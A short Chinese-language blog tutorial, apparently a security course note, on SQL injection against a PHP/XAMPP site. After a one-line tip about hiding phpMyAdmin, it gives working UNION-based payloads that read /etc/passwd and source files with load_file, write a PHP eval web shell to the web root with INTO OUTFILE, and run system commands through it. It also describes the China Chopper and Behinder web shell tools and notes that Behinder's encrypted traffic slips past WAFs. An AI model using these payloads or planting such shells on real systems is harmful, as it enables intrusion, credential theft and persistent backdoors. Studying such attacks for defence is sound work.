数据库
首页 > 数据库> > 3.SQL注入-查询漏洞二

3.SQL注入-查询漏洞二

作者:互联网

一.不要开启phpmyadmin

1.配置文件 /opt/lampp/etc/extra/httpd-xampp.conf

 2.修改phpmyadmin目录名称为不容易猜测的

 

二.SQL注入-文件读写以及木马植入

1.读写权限确认

 secure_file_priv = 空的时候,任意读写

 secure_file_priv = 某个路径的时候,只能在那个路径下读写

 secure_file_priv = NULL,不能读写

 #利用SQL语句读取系统文件

-1 union select 1,2,3,load_file("/etc/passwd"),5

select load_file("/opt/lampp/htdocs/security/common.php")

#利用SQL语句写入系统文件

select "hello world" into outfile "/opt/lampp/htdocs/security/muma.php"

-1 union select 1,2,3,"<?php @eval($_GET['a']);?>",5
into outfile "/opt/lampp/htdocs/security/muma.php"

#访问muma.php执行指令
muma.php?a=system("ifconfig");

三.中国菜刀

1.提前上传了木马

2.请求必须为POST类型,参数自定义

3.传输过程为明文传输,目前已经被WAF给拦截了

 

四.Behinder冰蝎

1.冰蝎是加密传输,防火墙很难分析出流量特征,比较容易绕开WAF

需要先上传一个冰蝎自己带加密解密功能的web shell

a=system("echo "<?php" >> /opt/lampp/htdocs/security/muma.php");

 

标签:opt,读写,lampp,查询,漏洞,muma,file,SQL,php
来源: https://www.cnblogs.com/eveplw/p/16536076.html